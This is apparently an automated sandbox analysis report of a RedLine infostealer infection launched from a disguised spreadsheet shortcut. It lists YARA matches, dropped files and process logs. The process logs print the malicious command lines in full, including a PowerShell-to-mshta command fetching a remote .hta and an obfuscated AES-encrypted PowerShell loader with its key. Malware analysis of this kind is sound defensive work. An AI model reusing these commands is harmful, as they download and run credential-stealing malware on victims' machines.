Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 23_2_411B1220	23_2_411B1220
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 23_2_411B1AF0	23_2_411B1AF0
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 23_2_411BCD30	23_2_411BCD30
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 23_2_411B0ED8	23_2_411B0ED8
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 23_2_411B3EDF	23_2_411B3EDF
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 23_2_411B3EF0	23_2_411B3EF0
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 23_2_41454570	23_2_41454570
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 23_2_41450040	23_2_41450040
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 23_2_414560F0	23_2_414560F0
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 23_2_41453370	23_2_41453370
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 23_2_4145F3D1	23_2_4145F3D1
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 23_2_41459B90	23_2_41459B90
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 23_2_4145ABB0	23_2_4145ABB0
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 23_2_4145D1A8	23_2_4145D1A8
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 23_2_41453AB7	23_2_41453AB7
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 23_2_41D65168	23_2_41D65168
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 23_2_41D60990	23_2_41D60990
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 23_1_00408C60	23_1_00408C60
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 23_1_0040DC11	23_1_0040DC11
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 23_1_00407C3F	23_1_00407C3F
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 23_1_00418CCC	23_1_00418CCC
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 23_1_00406CA0	23_1_00406CA0
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 23_1_004028B0	23_1_004028B0
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 23_1_0041A4BE	23_1_0041A4BE
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 23_1_00418244	23_1_00418244
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 23_1_00401650	23_1_00401650
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 23_1_00402F20	23_1_00402F20
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 23_1_004193C4	23_1_004193C4
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 23_1_00418788	23_1_00418788
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 23_1_00402F89	23_1_00402F89
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 23_1_00402B90	23_1_00402B90
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 23_1_004073A0	23_1_004073A0
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Code function: 24_2_028A20C4	24_2_028A20C4
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 25_2_00408C60	25_2_00408C60
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 25_2_0040DC11	25_2_0040DC11
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 25_2_00407C3F	25_2_00407C3F
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 25_2_00418CCC	25_2_00418CCC
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 25_2_00406CA0	25_2_00406CA0
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 25_2_004028B0	25_2_004028B0
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 25_2_0041A4BE	25_2_0041A4BE
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 25_2_00418244	25_2_00418244
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 25_2_00401650	25_2_00401650
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 25_2_00402F20	25_2_00402F20
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 25_2_004193C4	25_2_004193C4
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 25_2_00418788	25_2_00418788
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 25_2_00402F89	25_2_00402F89
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 25_2_00402B90	25_2_00402B90
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 25_2_004073A0	25_2_004073A0
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 25_2_25B81030	25_2_25B81030
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 25_2_25B81020	25_2_25B81020
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 25_2_29439A58	25_2_29439A58
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 25_2_29431AF0	25_2_29431AF0
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 25_2_29430ED8	25_2_29430ED8
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 25_2_29433EEC	25_2_29433EEC
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 25_2_29433EF0	25_2_29433EF0
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 25_2_29431220	25_2_29431220
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 25_2_296DF3D1	25_2_296DF3D1
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 25_2_296DABB0	25_2_296DABB0
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 25_2_296D9B90	25_2_296D9B90
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 25_2_296D4570	25_2_296D4570
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 25_2_296D0680	25_2_296D0680
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 25_2_296DD1A8	25_2_296DD1A8
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 25_2_296D3AB7	25_2_296D3AB7
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 25_2_29CB15FC	25_2_29CB15FC
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 25_2_29CB15F0	25_2_29CB15F0
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 25_2_29FE0990	25_2_29FE0990
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 25_2_29FE5168	25_2_29FE5168

Dropped file seen in connection with other malware

Source: Joe Sandbox View	Dropped File: C:\Users\Public\Libraries\bwsiuvcU.pif 7BCDC2E607ABC65EF93AFD009C3048970D9E8D1C2A18FC571562396B13EBB301
Source: Joe Sandbox View	Dropped File: C:\Users\Public\Libraries\easinvoker.exe 30951DB8BFC21640645AA9144CFEAA294BB7C6980EF236D28552B6F4F3F92A96

Found potential string decryption / allocating functions

Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: String function: 0040D606 appears 72 times
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: String function: 0040E1D8 appears 132 times
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Code function: String function: 028A6658 appears 32 times
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Code function: String function: 028A4698 appears 156 times
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Code function: String function: 028A4824 appears 629 times
Source: C:\Users\user\AppData\Roaming\uc.exe	Code function: String function: 029844A0 appears 67 times
Source: C:\Users\user\AppData\Roaming\uc.exe	Code function: String function: 02986658 appears 32 times
Source: C:\Users\user\AppData\Roaming\uc.exe	Code function: String function: 02984824 appears 883 times
Source: C:\Users\user\AppData\Roaming\uc.exe	Code function: String function: 02997BE8 appears 45 times
Source: C:\Users\user\AppData\Roaming\uc.exe	Code function: String function: 02984698 appears 247 times

PE file contains more sections than normal

Source: netutils.dll.19.dr

Static PE information: Number of sections : 19 > 10

Searches for the Microsoft Outlook file path

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Jump to behavior

Yara signature match

Source: amsi64_7800.amsi.csv, type: OTHER	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: 23.2.bwsiuvcU.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 25.1.bwsiuvcU.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 25.1.bwsiuvcU.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 23.1.bwsiuvcU.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 27.2.bwsiuvcU.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 25.2.bwsiuvcU.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 27.1.bwsiuvcU.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 23.2.bwsiuvcU.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 23.1.bwsiuvcU.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 27.2.bwsiuvcU.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 27.1.bwsiuvcU.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 25.2.bwsiuvcU.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000019.00000001.1624046151.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000019.00000002.1732584170.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0000001B.00000002.2524457336.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000017.00000001.1494452738.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0000001B.00000001.1707928386.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000017.00000002.1639938993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: Process Memory Space: powershell.exe PID: 7688, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7800, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: C:\Users\Public\Libraries\UcvuiswbO.bat, type: DROPPED	Matched rule: MALWARE_BAT_KoadicBAT author = ditekSHen, description = Koadic post-exploitation framework BAT payload

Source: 23.2.bwsiuvcU.pif.3ee39b90.4.raw.unpack, wrQqF835PFmCSFtGtO.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 23.2.bwsiuvcU.pif.3ee39b90.4.raw.unpack, wrQqF835PFmCSFtGtO.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 23.2.bwsiuvcU.pif.3ee39b90.4.raw.unpack, wrQqF835PFmCSFtGtO.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 23.2.bwsiuvcU.pif.3ee39b90.4.raw.unpack, wrQqF835PFmCSFtGtO.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 23.2.bwsiuvcU.pif.40260f08.7.raw.unpack, wrQqF835PFmCSFtGtO.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 23.2.bwsiuvcU.pif.40260f08.7.raw.unpack, wrQqF835PFmCSFtGtO.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 23.2.bwsiuvcU.pif.40260f08.7.raw.unpack, wrQqF835PFmCSFtGtO.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 23.2.bwsiuvcU.pif.40260f08.7.raw.unpack, wrQqF835PFmCSFtGtO.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 23.2.bwsiuvcU.pif.3dad646e.2.raw.unpack, wrQqF835PFmCSFtGtO.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 23.2.bwsiuvcU.pif.3dad646e.2.raw.unpack, wrQqF835PFmCSFtGtO.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 23.2.bwsiuvcU.pif.3dad646e.2.raw.unpack, wrQqF835PFmCSFtGtO.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 23.2.bwsiuvcU.pif.3dad646e.2.raw.unpack, wrQqF835PFmCSFtGtO.cs	Cryptographic APIs: 'CreateDecryptor'

Source: classification engine

Classification label: mal100.rans.troj.spyw.evad.winLNK@26/26@5/4

Source: C:\Users\user\AppData\Roaming\uc.exe

Code function: 19_2_02987F90 GetDiskFreeSpaceA,

19_2_02987F90

Source: C:\Users\Public\Libraries\bwsiuvcU.pif

Code function: 23_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,@__unlockDebuggerData$qv,VariantClear,VariantClear,VariantClear,

23_2_004019F0

Source: C:\Users\user\AppData\Roaming\uc.exe

Code function: 19_2_02996D84 CoCreateInstance,

19_2_02996D84

Source: C:\Users\Public\Libraries\bwsiuvcU.pif

23_2_004019F0

Source: C:\Windows\System32\mshta.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\yt[1].hta

Jump to behavior

Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7696:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3720:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bx55tq2v.0tl.ps1

Jump to behavior

Source: C:\Users\user\AppData\Roaming\uc.exe

Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\UcvuiswbO.bat" "

Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Command line argument: 08A	23_2_00413780
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Command line argument: 08A	23_2_00413780
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Command line argument: 08A	23_1_00413780
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Command line argument: 08A	25_2_00413780

Source: C:\Users\user\AppData\Roaming\uc.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Anti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress);$MtMSBjEhy.CopyTo( $wDjFzJY );$MtMSBjEhy.Close();$DaRjcu.Close();[byte[]] $dVtmfGSE = $wDjFzJY.ToArray();$ghWDGW = [System.Text.Encoding]::UTF8.GetString($dVtmfGSE);$ghWDGW | powershell -@{# Script module or binary module file associated with this manifest.ModuleToProcess = 'Pester.psm1'# Version number of this module.ModuleVersion = '3.4.0'# ID used to uniquely identify this moduleGUID = 'a699dea5-2c73-4616-a270-1f7abb777e71'# Author of this moduleAuthor = 'Pester Team'# Company or vendor of this moduleCompanyName = 'Pester'# Copyright statement for this moduleCopyright = 'Copyright (c) 2016 by Pester Team, licensed under Apache 2.0 License.'# Description of the functionality provided by this moduleDescription = 'Pester provides a framework for running BDD style Tests to execute and validate PowerShell commands inside of PowerShell and offers a powerful set of Mocking Functions that allow tests to mimic and mock the functionality of any command inside of a piece of powershell code being tested. Pester tests can execute any command or script that is accesible to a pester test file. This can include functions, Cmdlets, Modules and scripts. Pester can be run in ad hoc style in a console or it can be integrated into the Build scripts of a Continuous Integration system.'# Minimum version of the Windows PowerShell engine required by this modulePowerShellVersion = '2.0'# Functions to export from this moduleFunctionsToExport = @( 'Describe', 'Context', 'It', 'Should', 'Mock', 'Assert-MockCalled', 'Assert-VerifiableMocks', 'New-Fixture', 'Get-TestDriveItem', 'Invoke-Pester', 'Setup', 'In', 'InModuleScope', 'Invoke-Mock', 'BeforeEach', 'AfterEach', 'BeforeAll', 'AfterAll' 'Get-MockDynamicParameters', 'Set-DynamicParameterVariables', 'Set-TestInconclusive', 'SafeGetCommand', 'New-PesterOption')# # Cmdlets to export from this module# CmdletsToExport = '*'# Variables to export from this moduleVariablesToExport = @( 'Path', 'TagFilter', 'ExcludeTagFilter', 'TestNameFilter', 'TestResult', 'CurrentContext', 'CurrentDescribe', 'CurrentTest', 'SessionState', 'CommandCoverage', 'BeforeEach', 'AfterEach', 'Strict')# # Aliases to export from this module# AliasesToExport = '*'# List of all modules packaged with this module# ModuleList = @()# List of all files packaged with this module# FileList = @()PrivateData = @{ # PSData is module packaging and gallery metadata embedded in PrivateData # It's for rebuilding PowerShellGet (and PoshCode) NuGet-style packages # We had to do this because it's the only place we're allowed to extend the manifest # https://connect.microsoft.com/PowerShell/feedback/details/421837 PSData = @{ # The primary categorization of this module (from the TechNet Gallery tech tree). Category = "Scripting Techniques" # Keyword tags to help users find this module

Source: C:\Users\Public\Libraries\bwsiuvcU.pif	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: FT. 40FE CNY .xlsx.lnk	ReversingLabs: Detection: 31%
Source: FT. 40FE CNY .xlsx.lnk	Virustotal: Detection: 24%

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" .(gp -pa 'HKLM:\SOF\Clas\Applications\msh*e').('PSChildName')https://www.sessosesso.it/assets/aw/yt.hta
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://www.sessosesso.it/assets/aw/yt.hta
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $OsFNkdw = 'AAAAAAAAAAAAAAAAAAAAAOeGa50V5wUO7zHydkcFZbJINq4P3H3RMsqOZX56v9Ct1bZUtRZkWxrChczJINV9leAt1ry1WLWkiFuSzfzQFE/yWmqaDZXsneytUPY+5le4m5eM4W+YWzERSnn/urcy8+ZTG58q1h/+BzdOb3w2O1z7QWzthSNzGxOWWNyV7TmYXZCKVR/W4Wq5ilvQCut+dsc1oHeaxo3nDd5I7/VZnRBIlxsN6HcNAACtlxfRiNFMSkDcN8+7W2lqhnFd5fXX+lgvrRG0ld6mdkV9WDBX6QjfiDRmhCmcLWUj1Bf5MNMwFNO28V0dG8tS2l8mIOdvR6aZF2v7aj+0KYrMlbdDhYWFi7OKVRA/3XZLlb5bbQDQE0oOT0JAi3+7gTkWesgJWCHgEueWTWqAMCB6A7qRzrsbpayqU/WAl9/nKC9cB9JhUjr2ITV9Ek3kErAD+eAPojoNd7bQuKjVE9tLoDwyPKo7YLWXTQF8wgZm0Ja3MfKMwkGLjtfBjT7ucygj4kLX/Zk01swB2YhhmuTYGe58LHZYGFngyyCQTKG4k9tN5i5bStEsFZehOTKeivaD+CKVo0hL0r5uz5GQB2ew8dGCUwkPmeXZvkk4B1gaPU3SmBdkVfrvuhGsjc5t6HhSZTvvp6Jz9v2fJj6ahm37dhgqwqsOIhz9dfUsra5c/+Avs0Ho38MGy4FjkP6OU6wM3P9BykwtvTRUlAfl604CotxxEOc6gE6TRnaarDiD6zmwY1sYkKEtTlG2JS0b7n2FWA1GsA==';$JIfveZK = 'cFRkUGZlWWl4R2ZHdlp1WlRocFlZR3RFVUtmamhETUc=';$UGIWRBAh = New-Object 'System.Security.Cryptography.AesManaged';$UGIWRBAh.Mode = [System.Security.Cryptography.CipherMode]::ECB;$UGIWRBAh.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$UGIWRBAh.BlockSize = 128;$UGIWRBAh.KeySize = 256;$UGIWRBAh.Key = [System.Convert]::FromBase64String($JIfveZK);$VpSlE = [System.Convert]::FromBase64String($OsFNkdw);$uBmStTPL = $VpSlE[0..15];$UGIWRBAh.IV = $uBmStTPL;$cLYZAvcnc = $UGIWRBAh.CreateDecryptor();$eVtPpVFwq = $cLYZAvcnc.TransformFinalBlock($VpSlE, 16, $VpSlE.Length - 16);$UGIWRBAh.Dispose();$DaRjcu = New-Object System.IO.MemoryStream( , $eVtPpVFwq );$wDjFzJY = New-Object System.IO.MemoryStream;$MtMSBjEhy = New-Object System.IO.Compression.GzipStream $DaRjcu, ([IO.Compression.CompressionMode]::Decompress);$MtMSBjEhy.CopyTo( $wDjFzJY );$MtMSBjEhy.Close();$DaRjcu.Close();[byte[]] $dVtmfGSE = $wDjFzJY.ToArray();$ghWDGW = [System.Text.Encoding]::UTF8.GetString($dVtmfGSE);$ghWDGW \| powershell -
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Roaming\uc.exe "C:\Users\user\AppData\Roaming\uc.exe"
Source: C:\Users\user\AppData\Roaming\uc.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\UcvuiswbO.bat" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\uc.exe	Process created: C:\Windows\SysWOW64\extrac32.exe C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\user\AppData\Roaming\uc.exe C:\\Users\\Public\\Libraries\\Ucvuiswb.PIF
Source: C:\Users\user\AppData\Roaming\uc.exe	Process created: C:\Users\Public\Libraries\bwsiuvcU.pif C:\Users\Public\Libraries\bwsiuvcU.pif
Source: unknown	Process created: C:\Users\Public\Libraries\Ucvuiswb.PIF "C:\Users\Public\Libraries\Ucvuiswb.PIF"
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process created: C:\Users\Public\Libraries\bwsiuvcU.pif C:\Users\Public\Libraries\bwsiuvcU.pif
